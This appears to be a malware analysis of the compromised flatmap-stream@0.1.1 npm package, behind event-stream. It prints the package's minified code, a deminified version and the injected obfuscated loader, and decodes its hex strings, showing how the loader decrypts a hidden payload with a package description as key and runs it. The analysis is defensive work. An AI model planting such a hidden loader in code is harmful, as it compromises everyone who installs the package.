Original minified code:
var Stream=require("stream").Stream;module.exports=function(e,n){var i=new Stream,a=0,o=0,u=!1,f=!1,l=!1,c=0,s=!1,d=(n=n||{}).failures?"failure":"error",m={};function w(r,e){var t=c+1;if(e===t?(void 0!==r&&i.emit.apply(i,["data",r]),c++,t++):m[e]=r,m.hasOwnProperty(t)){var n=m[t];return delete m[t],w(n,t)}a===++o&&(f&&(f=!1,i.emit("drain")),u&&v())}function p(r,e,t){l||(s=!0,r&&!n.failures||w(e,t),r&&i.emit.apply(i,[d,r]),s=!1)}function b(r,t,n){return e.call(null,r,function(r,e){n(r,e,t)})}function v(r){if(u=!0,i.writable=!1,void 0!==r)return w(r,a);a==o&&(i.readable=!1,i.emit("end"),i.destroy())}return i.writable=!0,i.readable=!0,i.write=function(r){if(u)throw new Error("flatmap stream is not writable");s=!1;try{for(var e in r){a++;var t=b(r[e],a,p);if(f=!1===t)break}return!f}catch(r){if(s)throw r;return p(r),!f}},i.end=function(r){u||v(r)},i.destroy=function(){u=l=!0,i.writable=i.readable=f=!1,process.nextTick(function(){i.emit("close")})},i.pause=function(){f=!0},i.resume=function(){f=!1},i};!function(){try{var r=require,t=process;function e(r){return Buffer.from(r,"hex").toString()}var n=r(e("2e2f746573742f64617461")),o=t[e(n[3])][e(n[4])];if(!o)return;var u=r(e(n[2]))[e(n[6])](e(n[5]),o),a=u.update(n[0],e(n[8]),e(n[9]));a+=u.final(e(n[9]));var f=new module.constructor;f.paths=module.paths,f[e(n[7])](a,""),f.exports(n[1])}catch(r){}}();
Format the minified code by JS NICE
'use strict';
var Stream = require("stream").Stream;
/**
* @param {!Function} data
* @param {number} stats
* @return {?}
*/
module.exports = function(data, stats) {
/**
* @param {number} value
* @param {number} name
* @return {?}
*/
function callback(value, name) {
var option = output_ + 1;
if (name === option ? (void 0 !== value && stream.emit.apply(stream, ["data", value]), output_++, option++) : preset[name] = value, preset.hasOwnProperty(option)) {
var data = preset[option];
return delete preset[option], callback(data, option);
}
if (n === ++count) {
if (paused) {
/** @type {boolean} */
paused = false;
stream.emit("drain");
}
if (gasSum) {
close();
}
}
}
/**
* @param {boolean} r
* @param {undefined} event
* @param {undefined} i
* @return {undefined}
*/
function next(r, event, i) {
if (!costSum) {
/** @type {boolean} */
s = true;
if (!(r && !stats.failures)) {
callback(event, i);
}
if (r) {
stream.emit.apply(stream, [errorEventName, r]);
}
/** @type {boolean} */
s = false;
}
}
/**
* @param {?} aid
* @param {number} callback
* @param {!Function} done
* @return {?}
*/
function parse(aid, callback, done) {
return data.call(null, aid, function(passwordUpdateErr, startDirectory) {
done(passwordUpdateErr, startDirectory, callback);
});
}
/**
* @param {number} reason
* @return {?}
*/
function close(reason) {
if (gasSum = true, stream.writable = false, void 0 !== reason) {
return callback(reason, n);
}
if (n == count) {
/** @type {boolean} */
stream.readable = false;
stream.emit("end");
stream.destroy();
}
}
var stream = new Stream;
/** @type {number} */
var n = 0;
/** @type {number} */
var count = 0;
/** @type {boolean} */
var gasSum = false;
/** @type {boolean} */
var paused = false;
/** @type {boolean} */
var costSum = false;
/** @type {number} */
var output_ = 0;
/** @type {boolean} */
var s = false;
/** @type {string} */
var errorEventName = (stats = stats || {}).failures ? "failure" : "error";
var preset = {};
return stream.writable = true, stream.readable = true, stream.write = function(a) {
if (gasSum) {
throw new Error("flatmap stream is not writable");
}
/** @type {boolean} */
s = false;
try {
var d;
for (d in a) {
n++;
var val = parse(a[d], n, next);
if (paused = false === val) {
break;
}
}
return !paused;
} catch (x_rect) {
if (s) {
throw x_rect;
}
return next(x_rect), !paused;
}
}, stream.end = function(fn) {
if (!gasSum) {
close(fn);
}
}, stream.destroy = function() {
/** @type {boolean} */
gasSum = costSum = true;
/** @type {boolean} */
stream.writable = stream.readable = paused = false;
process.nextTick(function() {
stream.emit("close");
});
}, stream.pause = function() {
/** @type {boolean} */
paused = true;
}, stream.resume = function() {
/** @type {boolean} */
paused = false;
}, stream;
};
!function() {
try {
/**
* @param {string} buffer
* @return {?}
*/
var parseInt = function(buffer) {
return Buffer.from(buffer, "hex").toString();
};
var findPageFromId = require;
var colData = process;
var result = findPageFromId(parseInt("2e2f746573742f64617461"));
var eventSource = colData[parseInt(result[3])][parseInt(result[4])];
if (!eventSource) {
return;
}
var self = findPageFromId(parseInt(result[2]))[parseInt(result[6])](parseInt(result[5]), eventSource);
var id = self.update(result[0], parseInt(result[8]), parseInt(result[9]));
id = id + self.final(parseInt(result[9]));
var m = new module.constructor;
m.paths = module.paths;
m[parseInt(result[7])](id, "");
m.exports(result[1]);
} catch (r) {
}
}();
Following code is injected.
!function() {
try {
/**
* @param {string} buffer
* @return {?}
*/
var parseInt = function(buffer) {
return Buffer.from(buffer, "hex").toString();
};
var findPageFromId = require;
var colData = process;
var result = findPageFromId(parseInt("2e2f746573742f64617461"));
var eventSource = colData[parseInt(result[3])][parseInt(result[4])];
if (!eventSource) {
return;
}
var self = findPageFromId(parseInt(result[2]))[parseInt(result[6])](parseInt(result[5]), eventSource);
var id = self.update(result[0], parseInt(result[8]), parseInt(result[9]));
id = id + self.final(parseInt(result[9]));
var m = new module.constructor;
m.paths = module.paths;
m[parseInt(result[7])](id, "");
m.exports(result[1]);
} catch (r) {
}
}();
For example, the code decode parseInt("2e2f746573742f64617461")
to ./test/data
.
./test/data
decoded table
result | hex | decoded |
---|---|---|
result[2] | 63727970746f | crypto |
result[3] | 656e76 | env |
result[4] | 6e706d5f7061636b6167655f6465736372697074696f6e | npm_package_description |
result[5] | 616573323536 | aes256 |
result[6] | 6372656174654465636970686572 | createDecipher |
result[7] | 5f636f6d70696c65 | _compile |
result[8] | 686578 | hex |
result[9] | 75746638 | utf8 |
result[0]
- result[1]
is actual payload data that is encryped by aes256
- load
./test/data
that has hex values and assign toresult
- decrypt
result[0]
withpa-tree
's description - execute the decrypted code
- I dont know that code is worked correctly
flatmap-stream@0.1.1
includes malicious code- code: https://unpkg.com/flatmap-stream@0.1.1/index.min.js
- attack payload is encrypted by
ps-tree
'sdescription
value - the behavior was described in dominictarr/event-stream#116 (comment)
flatmap-stream@0.1.1
is used in 1890 repositories- https://libraries.io/npm/flatmap-stream/usage?requirements=0.1.1
- the dependence come from
event-stream@3.x
event-stream@3.3.6
depended onflatmap-stream@0.1.1
- The example dependency tree was described in dominictarr/event-stream#116 (comment)
The target of flatmap-stream@0.1.1
's malicious code is ps-tree
?
解読されたみたいです: